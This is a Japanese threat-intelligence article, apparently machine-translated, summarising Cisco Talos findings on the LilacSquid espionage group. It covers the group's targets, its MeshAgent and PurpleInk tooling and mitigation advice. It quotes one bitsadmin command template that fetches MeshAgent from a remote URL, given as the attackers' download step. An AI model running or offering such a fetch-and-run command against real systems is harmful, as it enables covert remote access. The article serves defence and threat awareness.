1717631355
2024-06-05 19:13:11
新しいレポート Cisco TalosはLilacSquidとして知られる脅威アクターの活動を暴露した、または UAT-4820。脅威アクターは脆弱な Web アプリケーションを悪用するか、侵害されたリモート デスクトップ保護の資格情報を使用して、カスタム PurpleInk マルウェアに感染させることでシステムを侵害します。これまでのところ、米国、ヨーロッパ、アジアのさまざまな分野の組織がデータ窃盗の目的で影響を受けていますが、さらに多くの分野が影響を受けている可能性がありますが、まだ特定されていません。
LilacSquid とは誰ですか?
LilacSquid は、少なくとも 2021 年から活動しているサイバースパイ脅威アクターです。UAT-4820 としても知られています。
LilacSquid がこれまでターゲットにしてきた業界には、次のようなものがあります。
- 米国の研究および産業部門向けのソフトウェアを構築するIT組織
- ヨーロッパのエネルギー分野の組織。
- アジアの製薬業界の組織。
脅威アクターが使用する複数の戦術、技術、手順は、北朝鮮の高度持続的脅威グループ、つまり Andariel とその親組織 Lazarus のものと類似しています。これらの TTP の中で、最初の侵害後にアクセスを維持するために MeshAgent ソフトウェアを使用していること、およびプロキシとトンネリング ツールを多用していることから、LilacSquid が Lazarus とリンクし、ツール、インフラストラクチャ、またはその他のリソースを共有している可能性があります。
LilacSquid のターゲットへの初期アクセス方法は何ですか?
最初の方法: 脆弱なWebアプリケーションの悪用
LilacSquid がターゲットを侵害するために使用する最初の方法は、脆弱な Web アプリケーションを悪用することです。
攻撃が完了すると、脅威アクターはスクリプトを展開してマルウェアの作業フォルダを設定し、ダウンロードして実行します。 メッシュエージェントオープンソースのリモート管理ツールです。ダウンロードは通常、Microsoft Windowsオペレーティングシステムの正規のツールを介して行われます。 ビット管理者:
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent- -local_path_for_MeshAgent- connect
MeshAgent は、被害者の識別子とコマンド アンド コントロールのアドレスを含む、MSH ファイルと呼ばれるテキスト構成ファイルを使用します。
このツールを使用すると、オペレーターはターゲットからすべてのデバイスを一覧表示したり、デスクトップを表示および制御したり、制御対象システム上のファイルを管理したり、デバイスからソフトウェアおよびハードウェア情報を収集したりできます。
MeshAgentをインストールして実行すると、次のような他のツールをアクティブ化するために使用できます。 セキュアソケットファンネリング、通信のプロキシおよびトンネリングを行うオープンソース ツール、および InkLoader/PurpleInk マルウェア インプラント。
2番目の方法: 侵害されたRDP資格情報の使用
LilacSquid がターゲットにアクセスするために使用する 2 番目の方法は、侵害された RDP 資格情報を使用することです。この方法を使用すると、LilacSquid は MeshAgent を展開して攻撃を続行するか、シンプルでありながら効果的なマルウェア ローダーである InkLoader を導入するかを選択します。
InkLoader は別のペイロードである PurpleInk を実行します。ローダーは PurpleInk を実行することしか確認されていませんが、他のマルウェア インプラントを展開するために使用される可能性があります。

LilacSquid が使用するもう 1 つのローダーは InkBox です。これは、ドライブ上のハードコードされたファイル パスからコンテンツを読み取って復号化します。復号化されたコンテンツは、コンピューターで実行されている InkBox プロセス内のエントリ ポイントを呼び出すことによって実行されます。この復号化されたコンテンツが PurpleInk マルウェアです。

PurpleInk マルウェアとは何ですか?
LilacSquid の脅威アクターである PurpleInk が使用する主なインプラントは、少なくとも 2014 年からオンラインで利用可能なリモート アクセス ツールである QuasarRAT に基づいています。PurpleInk は 2021 年に QuasarRAT ベースから開発され、更新され続けています。検出を困難にするために、高度に難読化されています。
マルウェアは、C2 サーバーの IP アドレスとポート番号を含む base64 でエンコードされた構成ファイルを使用します。
PurpleInk は、ドライブ情報 (ボリューム ラベル、ルート ディレクトリ名、ドライブの種類と形式など)、実行中のプロセス情報、システム情報 (メモリ サイズ、ユーザー名、コンピューター名、IP アドレス、コンピューターの稼働時間など) などの基本情報を収集できます。また、このマルウェアはフォルダー、ファイル名、サイズを列挙し、ファイルのコンテンツを置き換えたり追加したりすることもできます。さらに、PurpleInk はリモート シェルを起動し、指定されたリモート アドレス (通常はプロキシ サーバー) からデータを送受信できます。
LilacSquidのサイバーセキュリティリスクを軽減する方法
LilacSquid による初期の侵害操作から組織を保護するには、次のことが必要です。
- インターネットに接続するすべての Web アプリケーションを最新の状態に保ち、パッチを適用してください。さらに、他の一般的な脆弱性による侵害を回避するために、すべてのハードウェア、オペレーティング システム、ソフトウェアを最新の状態に保ち、パッチを適用する必要があります。
- 従業員からの RDP 接続に厳格なポリシーを適用し、可能な場合は多要素認証を導入して、攻撃者が RDP 経由で企業ネットワークにログインできないようにします。
- 特にツールが内部で使用されていない場合は、システム上の MeshAgent 構成ファイルを探します。
- コードをダウンロードまたは実行するために bitsadmin ツールを使用する場合は、慎重に分析してください。
- ネットワーク通信を監視して、特殊なポートでの接続や、ドメインではなく外部 IP アドレスに直接送信される通信を監視します。
- 疑わしいアクティビティを検出するために、エンドポイントに検出ソリューション(エンドポイント検出および応答または拡張検出および応答)を展開します。
- サイバー脅威に関する従業員の意識を高める特にフィッシング攻撃を検出して報告する方法について説明します。
開示: 私はトレンドマイクロに勤務していますが、この記事で述べられている意見は私自身のものです。
#LilacSquid #脅威アクターが #PurpleInk #マルウェアで世界中の複数のセクターを標的に